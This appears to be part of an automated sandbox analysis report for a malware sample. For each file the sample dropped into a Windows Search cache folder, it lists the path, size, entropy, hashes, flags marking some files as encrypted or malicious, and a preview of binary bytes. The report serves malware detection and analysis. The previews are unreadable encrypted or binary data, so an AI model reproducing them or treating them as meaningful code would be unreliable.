                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:192:lqYKa3dSmb1PqC3yeGnq/XMo7TVudGYDb8/sfnTDEZDU+JSOlGv0XMZlaA6SX606:PTnPMwrnOnTgJXJShg2PFCTfESTJ0Mr
                                                                                                                                                  MD5:CE540EEE333802613EBA11577DD99F23
                                                                                                                                                  SHA1:40DC3DE38089C57CFC6414EEA177F9EB0FC039EE
                                                                                                                                                  SHA-256:AF1B69FF782FF52E299BF1FBCC9E2FBC7828513EFF896FCB55A9E3F4A3852CE7
                                                                                                                                                  SHA-512:63D8B6C9F7A326884E0DA43E5976C26AE817FE3B0D5A30A570D1B19DEF1C149DD84E305F8C5F56ADA8C7ADA3995033105E824354A45D5D4830508847BE979A51
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:!func.2....R.+<9.....,a.Y.*.r..3.|...1A.Qw..o..c=...i.ai..J.A..b..X|..+.p..D.b..DJ=...U........v.P....i..*`.R...(.s>.&...w....Y...Hk..N........E.0..S..h.C..6.xG&.7&.T?.e.\....n5z......x.....8-.2.....a.......6`".4O........[......W..t.H.....6.k.x..B....eCs.....Ms.'...]5.z..e..0Gr.e.Z.m..g.}p!.)>.*.l.....2..oa3..1@G.K...F..Q..o..~/1fsN.[......v.w.9.m..t/....1.$....H.uYDJ...vf...E5.r.,.}..;..w.3......8...G...D..^=,..].0.S...:...".......@.;L*|.t..s.._h..S<...9FB.3.. da..*h.b..Ag....c$.<...]XKp....)...^.=g..iv......LWf..'.....>......M...V.|..9....R.H..{........>......L..r..T"&f....S:.]~......q..0O....R..L.Y.H........8.rE.".,.5..7.W.t.8../...5.#.f.6.o.E..g2.......0.[.E.>.DB7.^..M..E..@...G@.2.&{j{B.~.q..K..M7!...X,%v.}br...g.o.......1RGf*.I/.6.W....s|..Be6,5Wp^......O...).&..UX.iz...\..>....g..7.\T.$....%.a..1....m)..e..m(..j...sWv.b{..$..bM.9..g..=.@.P.#6..l..U>pd.}u.$.....^.Q....]....2Zy..tN...%.]HY.].9.N....P..>R.'.q..\..O.N.M.....TI#.Y

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\ZEGESUAP\7\GW3DpE2qmyibnbFrEIzpiD0iGLk.br[1].js

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):825
                                                                                                                                                  Entropy (8bit):7.758379179507963
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:zOXirWv3Dp4bic3UGHqkSAfUkw6aJY38kZSh/Ojfr/AE0MNbKq7oQMzybuVMSUdV:zWcickyqUsQaJFhmfIqKq782bD
                                                                                                                                                  MD5:BB07F157AF854BEFB0BA41AC790CD41E
                                                                                                                                                  SHA1:8249D1048BE8E29FACA0DFEB7890972FE188B092
                                                                                                                                                  SHA-256:C4A7997422DE1C0B1C1EAC0B318087446528B673AE3E707422F93CFCEB345039
                                                                                                                                                  SHA-512:3E1A70713540ECC6601C2854AFD05A46D10E1FDAA2E590F003147A79D46B439C856E63338E43DBF23781E61C77C0281C8D69C95B052C97B264DFBF2A1BFEE581
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:var W#q...+....b>....-....~....a....-...#........wJ.}..f:.......k~....I........m...@O...D....M.. <..w.%..[.piy$/..f.^.'[.5'@.X.....<...Z....5.]..l....eq..&Rc9...q....k....'....5d..q...-`.".t...}.YAB.Gy?V......M;.-.lf_s......S...r~Q..=7V.O..-.....(..y...k..h.{.g.&..h..H.f...........B......y....CB.".5..W..hJ.yl...oQ...T.P..#.}Y.......Id..V...=-7o.o.....3d......g.L..no....@.?8P4.LH...`D.ST.."....F...>m0.B.y\..yj.^.&.a.........ie.U.j.......|....nm..H5.;...K.....J.h.Q.vW./r..D..._ol..z.....bBx...k....F.ka..X&xK.)8y..C....]..g.p..4...c.t..@F-w.l...2...$e.C.,c<..G..k.Dv.....p~,...U.<;3.<..|#.z..fk..15tp,Q.."`...B"S.M...~....4....N.Y.@0...\i.M.Nf.y...s.F]...`.......>..8.p?{ .I NW@.-.'..8...5.\.-.....UmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\ZEGESUAP\7\Init[1].htm

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):115304
                                                                                                                                                  Entropy (8bit):7.998566422787926
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:3072:iwwWWALCceZDVfnE6YK4M7NA2qDRnJ1BdjzYMb41yBSLrI8e:iwwWWQCLVX4+denJ1BNY249HBe
                                                                                                                                                  MD5:4E09AD44E8D28192B20E38D23F934905
                                                                                                                                                  SHA1:2FF2803EB8CEFB276BD672134B74A47BF1F3C531
                                                                                                                                                  SHA-256:2917A348CC35B770AEB4E24573146895A0C50FE1D3C5E127CA864FC015EE3664
                                                                                                                                                  SHA-512:F08D90DC20A04FDB92062806FB3E35DBC5E7D5CA5F4848E8B2A343F1A430959BBB8A6A63BC2EB27ED8461F516AC76A48807EE3D5769403F56FD08C254351D998
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:<!DOC.w.....(._RP....zV.]{{..l.D..GT..cj....G...tQ....?..@....<.c>.5".T...V..<.......8...F.....6.-.V...2.y.4_.O.......k....K0%..j|?...L..1....$s..b..F.zX../.d..d....@d.k..;P...............H|t...8)v.?i...&z....A.....u0z..%Q2.t..y....f;..H.).>...p.+.aK...3...... *........c."}.B`..@>......l..A.M..hu....?&A...=...M.......X*.`.w..........x.5.....A...)p.k..n0Y.>Q........vm..$.107(.OJ..uf....]b.Q..;....~d.\u38..[..LM.X....s.2..d..?....]ee...G..^(.V|.U....../.....Fp...Xs....H=..3.....%.......b?...Jm..._..=..`......4-A.[C.5....]o...%.E..!.0.Cg...Be..7.N.o|..#..K.O..6.I..q.:..r..=.@TB..i...A..x.+..Q..G.D.....E..43.g..Y...]:l|d`... =..Yx...%...d.q.&>TK..}.g....../..LU\..c..YY2..U......1...W..e..O...jf.(QH^.......5..A...Pn..~V....].|.....Wy,9(....v..R..0s..|8.r..M..Qz8.:.N.. ...m.g.......fV.o......e.<.q.1>......+MC......T.9Y\.....8.2...v.x.R.B......p.>....7|..K..../.<.B..z.......}j.H_#.w/L...S....fA..kL3..::....m.a......{..ja.*L.X6.4.*

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\ZEGESUAP\7\KF9j9oJUfaaKiX-84yf0U337ge8.br[1].js

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1749961
                                                                                                                                                  Entropy (8bit):6.574404072271602
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:49152:MVy2Z4SUX/CjrjYz6J9dDpwBcOTvz2EsoTE+rQU03GQX:/2ZVDuBcGj+
                                                                                                                                                  MD5:0A4A0F290D8C55C8A546B3E246330CD4
                                                                                                                                                  SHA1:12820629963DB0711A14D84F846D8E31320FD9D4
                                                                                                                                                  SHA-256:69C8DB295E23282A2EC05C6658D501AC27671B64FF0E8E060E84A1CEA6343636
                                                                                                                                                  SHA-512:48ED45EDD89E2CAA1EF3824BB9923BD01A62E63527B25481B08055A5C97E296C77BCF143C3C38AA3DF04FBEFF164294F79046FA5EC8340E53DC4FFE9419EAA4A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:(func.8..-.:fX....s].e.o.....Od.w>...c...]....71.....N....;.a..V..q%....7..j.Q.....;\..{.AB....$h.J..\.ya-|...O....f..Dy.E.B,{1A.y.\"3.X..Wz.N......./..A.v..q.4b..l.."..l&rD...D..%o.&.H,....#..9:O.f`.v...sA.!.^..T..).{.ZR..d.<;.X...|].#[..g...DP.&..T....p.i%q..@.`I.@y....?F.Q,...<.....el.....s.iE-g.C.X\cA..L....F..x.>!Qw.n.x9.2p..F.5.W.==Vg.3<`...g......@c>RV..,.}O........UL..........P..t.hP.t....W.z#z..i.=..,Sfk.;....}s..X.A.M.w..b.g..Z^..n".Q5IK.@.....s....!e...............P}b)i.$Q.`.?..7+H..&...G...5..J |...gX.Cd.]..J.I..9..]9.p...W.......|[/...*....0n..Q..[.f.....0...=.'..L..N..y......dF.X.G.:?.n3 M.R...|.....joV....%.[0...*.......6..k'B.G?.D......u..1..#....&...@P{L....`2.A.C.R...Z...V..8.H.n.xe...Sx..W....S..}.r7E..}u.}.w.%...M....[3../L...E..1.!k.P8ldm....[.......Y.g[....1.....X3.:...C.......|....e:J6.{...%.......v.>../R8.;c..._..^#].....p.W.[..aA.7={.zqQ.t.e.J.....S1R=..U.C.JKFV.+9+.V......%..y...Q.&.....w.yM...,.L.;...6..

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\ZEGESUAP\7\Kwh038ybdvX_puLwdopqHydJtVM.br[1].js

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):467497
                                                                                                                                                  Entropy (8bit):6.282480045974415
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3072:4B+XijtvA4q/58IIkwijOAPQadIH/suQZy/orsvB1XFOiM:4B+XiJAGijOAPnKBQSFOiM
                                                                                                                                                  MD5:90ADE73FDFDD082D7B1441F7A69A4A6D
                                                                                                                                                  SHA1:7AA92864B4C351950CDA41BF489ACB905D5A9762
                                                                                                                                                  SHA-256:7452DDD51363AC40E11A8D123F23BC408243022F8C47B0B1AF1D044CD6C6976B
                                                                                                                                                  SHA-512:3CD02EBA2ACC84E8D9D3B400BCB37A42DAFD6A0760E46531A88397BD988CF427A8C018197349AE333540813C11FE19513FA83297FB6791BA138B207FFE86B6AC
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:var W.>nf?....E.'.0.h.!..n..@....[............Ik%'e....I..H..A>bz6...q.t...#.!C..{1..F/.....5>...@.M..ws8:...<c.\....)T..zL..N}../......a..m..:.3xmq._C........4.:D%w....U.e`nx.*...i.A.T}Z...n.2..#.Y......-...i..]2U*}...h]F{..y.>..$.x[#.}....V..m>.....2s......`..QI....z.8.G`..N2n...T.m.gul:....h)...6....%Z...PZ3i..`...r8..q.q...w.l.}......s..05.q[..e.@...k....9..0..J*?.W.P.z[......&.E....>d.%H......(MGp..p..5.1.....$E...,m..Y....;...W...p..w.w.n. 2x.T.h..{....x[..3.+D..V...}.M...~._Q.8.Z...P...F.^..O......P?W..~X...O..yO..}8.;o.S...[.+...x'R.&.z....p...(#%.......Z+.."K7}...Jup.....^..rdG.M.w.C......`..4*.[..!.U.8.Z...Y..h..z%pk..>lq.......~...p..o&.R..#....b.K.Q%.*...[ *.0x.K......Y..?.'..`./h.c.....G!.O...\..X<Z....5$.+..h...P..........m....s..~.}..&..m(*F..8A....uD}.._....0>.XY...+0..*I<Q_.....R..A..._0..VN}....5U...U\f:..@....\...q...$..j.V&s. ......ET@..c.....|..".]?..........n.].M2.L)jkf..E...|.wSq..4b..*v..{~X.jw|...?.`x...|..7

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\ZEGESUAP\7\KzWxoKDHqNy24XFwlA6xWw89_DA.br[1].js

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):9214
                                                                                                                                                  Entropy (8bit):7.97940102203871
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:GvHCN9eSuUUgFaFrM0DjP1/obrORaPKuDYGtDXD5tA2Pll97vzHH:hBUVFgijPlDxM7D5ui9Pn
                                                                                                                                                  MD5:3702BE19870928B5B3B9F33D1D0B36C1
                                                                                                                                                  SHA1:A07042A6D174051939E89763D0327A23CD595266
                                                                                                                                                  SHA-256:49214AF0D9095D0A11D71124604EE9C5BF1C58E30672BBDDF3532A2E8CB353B7
                                                                                                                                                  SHA-512:AB763CA407AAB1A171BED421C7AAFE6C8A3D650F940A821486BD73BD4CD197E29ADA14119F604E8D328C583DF76A27682B3C69DCF6124B713108FDB7B2CE7346
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:var F..FP..\)...Q....]....?(..B..m..W\q...~%.G..E.3H.QD+Q...!. {x..R^..n......!.....i.\YM......y..Y...5K&\L.....')..R.....!N....tp...F.3o....s.....Aw*%.S.....x.xZ5.#@e..\...*.[ ;7.I..H.......Y..}.2|..{...t...v.v...q...a..q..mR..$K...-.....)...?.......g8X..k.y..s...U.......V...|>.R.oI+.y......d..I..91.`O'P.t>.....>.....C'.M..^..E9.C.g....=...%.r(.A@.......:..=.F)5d./*...dC>..0a.. $p.j....h..:Je..;..F.. .+x.....f.......+.S........&kY....... cM;..{wK:....{@.`.......z..O]...t..S.4..-7xR.{!.....X.g\L.._.o?..YcUb&.O#..d$.1..ig.$x....G..Z..0...TC.@.h...9)u.6..y.......>.%a...k.("~.>x2...,..S.3..eu....C.k.<..y....~4y...........G....S.......dN....;P.._...ht..5....5.a.VL.)....%..... .A.d4...d..U.iD84.[..].F.:....>`c...X..e9.Q.5-.'.q.r....=..\l...r....=.EOP..s.E..'8..8...s.#...u...:H.Y.:.V. .....G..wg..$..t..V.Z...rQ.83Op..."F...E....$..e..K.J.....x...../..n.*.&.....xr....5.}.E.@...C,db...n..Y4.b.....7...k......*(r.oVe6._.YF..U.<.F..#.............

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\ZEGESUAP\7\LisgCZCwGQ4lRz4go9tlwPslw_k.br[1].js

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):16105
                                                                                                                                                  Entropy (8bit):7.989449448901001
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:ZpEimYiDz27pg+MNSzEFlPxM0BgyV8lt7qdYn2DrOUO51mn/G:Zi5Yd24OlPyhyV8lt7CDaRAn/G
                                                                                                                                                  MD5:5C420D55BAC9F4144ACC558D2582C4B5
                                                                                                                                                  SHA1:50A5ADC6AC11A70D86DB79E0DA1D68B2A89B602D
                                                                                                                                                  SHA-256:2D065E017DA188351DAB7585F253796D6EB9768F08DF9DD13C1021486A9B54E9
                                                                                                                                                  SHA-512:8FD55FB8D7FB1177C41AACA970B978A099A3891B4E66F13D8A3C93F9A612070A17D6CE7F68068213CBD71E49793BA709E7819397D46F941F9949D529DA4B4A44
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:var WZKb....~.k.Z.$).....J.&..>!....q.h.-.....U.6.2..%.0G..%.pB....}K..5`.....wg...o]..H.jU.....I.zl....3..W*H....)..g.Y.?...p.[....M....")..fF.......C.m...H0DJ.&....R...).N..1.,d...q~.Lm...y.6..B6.@....._.a<)$.......>...ss.....`..4E.......o...0..1m^..;^.}e..+'c.8=..+.....4`:...u;n..TB..7t....2.z&^..|w.Zl..9|^...gr.i.....k..$..lI{.l.X.hvV9.I.L.6q..(.".Fk....{.qA...TS..'....4U..6...Z.EK.j.........}.XP....E.m..F.V!I].j...1.!.*..U..r..KN.N..zb..2...%q!..x.......y....Qt.....X...z3..[.:.......vj...2..eV.|t.#...H.........f-.3>.Re......X...........I<..,_@d..aQA..O........Kf[UF.....h.s.N?.u1...yJ.Z*.K......:.AQ...2V)<.&..Q..F.q.j..lW...7.R.n..H..F.3."....g.... .sse....Oq..............]9.N~..g...!.+...._.....<...$..W.E)|.e....t.].....EL.n.Rs+..l).A.8...5...oQ.,7b..=....%Er.8....k,...N...M...."......N.X`.^1._!U.~E.......}..s..8<.$6........\$Z.........m/..h\..R.......I.-.....M.i../i\$k.mV. .....G.R.Rf7...Au6,C....9..b.....v..M.<...+4 ..#g..

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\ZEGESUAP\7\MgSq5EEOyYvlI1qVlLOXfgRHmzM.br[1].js

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):105444
                                                                                                                                                  Entropy (8bit):7.9985217509208
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:3072:JrYeMHpJT7gerk262z1xs6BfCAMH/3BMwZ:xQH/Ptz62zbs6Vs3BL
                                                                                                                                                  MD5:84AB2A29D6A6046503A17E84CA656F1A
                                                                                                                                                  SHA1:BD006B46D1BCD4232C43E1328BCC56F517C7B39C
                                                                                                                                                  SHA-256:9E1EC523800101AD62F61BD8CE92A5DC34A0D2C70F4B61E2A2E1D0F714B3356F
                                                                                                                                                  SHA-512:CDEFD3F7A80642E153434F2D2FB593E9AFEB3EAA1B303150C1023D99794EB53A799B1041D6C6D7C99BC6BD1707D2C19F58D21DFE2F2F780DD3071547C0A53A62
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:/*! C..@.../.`..Re.L_..W......&S..R/.E.2.-?..1.@.)B..0x.C...E$....:SX..Y.+.BV^..a.*.T...........L...l|.+)=.........A......W<...0."..[I....u.<..vk.K.!..{......Az.N].Py~....8.h5....m.-et.p...k...Y....P6.6...}.@..L.a:.~y7..c_C~..I...l...h.j{.WW.(..@3...;.Ag...X.....P...nR..C. L..Q...d.m..J....#.x.Q.8f..|...6.O{Yp.B(G.^..p.:^....Jp.r.^......hs../............u.vT.N..-?.....o........TN..55L. $..K\.WQ!....!.V.......}8bn.&8....H.`=i= p0(TK...^0B..m....B.2jGS. ..2;.B.5.V&..%...U.c..;.y+2..ER:.c4&..r4%...Ov.=^......H."P.......!o.R...r..F..Sh+$9..m./i....Os.u.39.W@. sd&..n...D._:.......[.....M:...'O.1.j.B..Z..~........v......s.Q.bI...W[..Q.....,.q.Q..i.k...8_............V....T.......%2.C,.lI....H...Zp....I...H..l.....8..+V.....i..wYN.....#7.e/............0.H......m...v.b...D..+.6..E._.P....AF.JO....V.e.g..:|...............Kdg.. ...W.:..'E....-.^-...W...O1...81r{5...rvz.l;{.B..v.x<."..M.J>....Q....@...d...y.w...w.M.y....g.q..g..v.$

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\ZEGESUAP\7\N1a_FY8_9YTjAb9nKlOpaAAvPEs.br[1].js

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):14501
                                                                                                                                                  Entropy (8bit):7.990014028733653
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:384:Gcql96usOMhQVAsJ8P1q+JZLeA/tPOxxfKT8Ax:Gf1sOwS83JxeA/xH8M
                                                                                                                                                  MD5:C32FAEE13CA8E3E3B46878C09D85247D
                                                                                                                                                  SHA1:D14F4E78F2911A21563E4D8F21E8A327BCC6E002
                                                                                                                                                  SHA-256:2F445016D699100896F76B5DD8C199A3E81EF2F624D2BC6AD4A045E108E99E34
                                                                                                                                                  SHA-512:AF281C1E91949FDC48DB0449B06E6BE19146A8846784C0165EBD1798D3B203154683E2924F19B7FADCB7E3CBC6D4D1CE59136C07B057AC38CCC078D819A220FF
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:var W..c<...[.oe.;...V.fA...zB..I.h...^..Z.X...IJe9.. .u.Hj..>.......Pk..}0..b.wf.m.xF.U[.....0...[tL.1.\.6&.."...e..........>..F....#...~<...5....S....0.[l1......;.,A(.F.$....y.:. ;.`4..dw..]/..q.^..,U]8....}.E0.f.DU\O39{7@...._.Q...S.D.*o.QG.P<.w"...&...).y.$~.(k.yf5.....i)Uen...i/G....`d.q.F.?b....L.....5.;..b.G.._ov..|?"{N\Z..6...].R.B...OQY...T..i...e...Zw..%.o5.;...Q.....g.7.\3....(.....$...o..:.-ho..9[.i(.3..n.zY........7..8...R.Vh.P......v.V.A..y....l....C..u.#CM..Y.P'+.X".l..|...!.^..d..1.@.x$.1.>O.-...Q...}Q....Wr.Z.oF{...n...V...}@.Z..J.....D..H............. .c.....!`_...[t ...x..~.H!......F...X....c..B..A.ZA....Wg]....a..F.3..yC.9`.Pt@.m....2..mH7.....\i.5.|.PI......eV...X(x..Q.r..)A,....kY...........-6.......!k..R./.V.d..........w...t!..$.....[alvC........!.L....(".\.$.F$..%.2W..._rc..y`j.a......@.6../<.+Rm.E........kBC....@..A.. .1.P=..5../.t_.B^..=.h(.....PZ.._*F..._.6.d..=...f.H..).<{....7_LXK.U.T...k.M...j......q.(.M.l..

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\ZEGESUAP\7\QNBBNqWD9F_Blep-UqQSqnMp-FI[1].css

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):340
                                                                                                                                                  Entropy (8bit):7.300801554001593
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6:j/wVkI/Aeoe8y9KJ+6yCvtM121khFUuJUEUKS2VjoolnIS1WdNcii96Z:fQ8xbyCv8fRJtT/PWSUdNcii9a
                                                                                                                                                  MD5:EFC86AED8B437400F902658740C00CD7
                                                                                                                                                  SHA1:22FCE1AA8443C162E95CF2FA3D02024D43823E76
                                                                                                                                                  SHA-256:9392C73FAB92FD152F81E358B7C5E83AE37A19FA9765D55CCC434F7CB5734F19
                                                                                                                                                  SHA-512:E3B64A6720E8F1C0F9338F15DB4CD78FFC8534785E9FD5C8468D96791D559CAC5050ACD92D2038F4643C0C2EA1BC6257C65294706BC662A5367F7D53B15817F0
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:z{a:1..h..K.-0.....M....3..$...,.V.8.S.......Z.....f.y..'.o.^..k........:...\.{/..x.Y'Aow...TJ....8(+@..xM...%@.PDr..#U....|^."$....B...;+^:1!..\...k]..0..L8L2.....i....L?.h3./27")V.n...+:...`....%z.....vw7d{..T.e$....D.O"1.Gh..q/. ..'.U..d\../..n*.2mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\ZEGESUAP\7\QOGkmcG8R0fLT0lwbpvm9BNIUiY.br[1].js

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):3201
                                                                                                                                                  Entropy (8bit):7.942406168786797
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:gWO7NkXKtO2gId/qnj4VMypTwUuVp4ydAKdN89Rtbs4SJ8iBcQ/zD:lskX6coNw7PNGRt44SZBc8
                                                                                                                                                  MD5:5A58C0B407247A75A6491FB003C92B3A
                                                                                                                                                  SHA1:D088736C37430D5737F6D36431A454EA58426F2A
                                                                                                                                                  SHA-256:1F8816F7108095FAF4F7932815AA7002EA4DD7ED472E9B1FBEB9BE492280131D
                                                                                                                                                  SHA-512:CFA10A702A58EF5BB66B7CEE625FED05AA59B8C41E4A3EB177B22F351B3561EEBD29A971AC938CABFA3391F0081C037A5B606B32CACE1182E3AF78B49A53D56B
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:var W...^.....3..=...;.9.3.%J'.9........2[.>A9....-....{...!.c..Mn........a(K..'...6...8c.^.....<EK...V.(D.6 ".i.2SV..X!......_..>^.s.m'...x~L%.d.k..j.N*c..=..*^K..Ie......*.R..E.f.!..xxI$.`.N.b.5.v5V..C.B.x....T....O...o.......JL...._..hC...eCc.J...]G.b...Z..D.s.*...p.X..i!.......8.?b..8..{JC.?....E.........B&.....1.Ej..2B...q..x.....1....3......L.....(.%P....H.@....z.:G.E...."{4...js^?S....<...K3...;h...a..(.(O.6q...A.-.Hx......2.e^msx;.7.X..s..H.5.K.....N..R.............!r.u......km`.....-b.C!.O.@.)!..%,.P8...H.........<.uj...c1..G..h..tL.....q.'...${.j........4~e.V.A:.6.........y.'f..[]..%.......XKm....o.........\.W..A...*#u.....:...o;z.q..Y...`ZX..\.....Y..XW..l[C.gJ.N...g<.;5.(.a-2...{..Z.c..E.U..~..VCT.s....^.(@...3o.8C&D.m.m......B.F.7...K.p..........Vv......%..M.w.o.............t.1V..7....x........q..W..,.K.f.F,.{.4<...&xc.U=L.|..R..7....Yj_...Q......{..+.5.L......(d_..2v..E...G.Y.[..9..........(.W.+.^.e..>kS.r..e...i..2.L.a0.

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\ZEGESUAP\7\U7NyqzPRBLq0g0Z9QPSKxnaembc.br[1].js

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):11147
                                                                                                                                                  Entropy (8bit):7.985771627466053
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:rBFD1wRUDC7QsmTiSKegmmbX8JE8xdR9J1tk/vuEFSWE+1+6U1c6r+yVxyfPXinP:XRwnm2fiJVx5t21ZlU1p+gGKekT8k
                                                                                                                                                  MD5:CFC35AAEC37A57374AABD1941D48F7DF
                                                                                                                                                  SHA1:E2570A8FFA0964BC1CD65693307AEA68DF8096A7
                                                                                                                                                  SHA-256:59CCF64297D826B3E372EA8FEFACE87ACB9C8B5E699D5D5AA9D948616FDCB765
                                                                                                                                                  SHA-512:BB1E46CADB3327C9FBFC417897C5663AFD9D1176004F1E64D7E6177A76C1DBBF6C8F6F47920B7D15E79969F05FA86BF0B8DFEF242384377B1CF9FDFD3459D975
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:var WP.xY.teY..T...*..{..Q...s.......s.......f.g...sbdA..Z.3..=~M..k;`e./e.U.x..px.h.y.sj.2g.a......I....;.H#....MVU..R.Lt....i.$..%F.v....Z...+..%s4.`..B..Yg..a........d$I........z..Hw.u.I.=..#.Q.a.&`$..o|.G....0........@1.6k^....h.F.w....U.;r.,..r...X....OD."d.......)]z{...E..._K_m....U&./v..}...z..mAh..S.i.-.C..e.)^.,a&".........a..?.G.v.....4...=.."..-.;.h*..).u...8">o||...........w.~/R.d.@J...H/..".....9OQ.C.ZT.OT'Yd!.....4.....3T .4X...t..AL.../]%W..<..h.-tK.C(uQ....6d..g..Z9..F...D&l.5.....&.W{,_p.C...j..o7.Q*TU.E...<..3.gMQ8m.}...F6....<...Td|7[.)..5(Pl.=.c.^jY...M..n..G.8.>...l..U./....#..=.M.g..+.Aw..^:..{......R....v...&W...A..uo9./F. ~...b.M!+....d....=}..v..M..$.$...F.37.......+ ....d..H......m..ve"...~............f"..'*...e.N.e4..`\.'...R..{.0...a.=O.]pGZ......f~.6...0......9;G.....O......mk..T..{..3g.M..\si(I...L..A:E.mwa..X......?....vs.n|.....C..U*.K..../;.a,[).m~...X.OIhGk..cav@w..YD.........DSV.........qN.H|v...`!.i.7*.h.~

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\ZEGESUAP\7\XDTV5Ztdmvo1jmUE21mPICYC5h8.br[1].js

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):545335
                                                                                                                                                  Entropy (8bit):7.032590327012393
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:kUg8U2gXAlzXIpmTJoaV4MYwRjMIP0dUW6cUlAvO3WWtAqyebWvTOQ0:kj29lewRBP0dUW6c7OQ0
                                                                                                                                                  MD5:92CBB2D7A09776CCBAC2E3B8EBA94201
                                                                                                                                                  SHA1:049142217FBE73FBE204452C0189C06254642EC9
                                                                                                                                                  SHA-256:F14A89D487759C8892949C4F0871371D86A1908DACC69E547FA7883AB703D493
                                                                                                                                                  SHA-512:B76777CFBEACD2DC4480A74F4F14B602B81F3A27FBE39D7EA7646296F504617855F967209C4393211FAF372420DC80AC3C289A4225FA6BA875D9A0CE34B6F332
                                                                                                                                                  Malicious:false
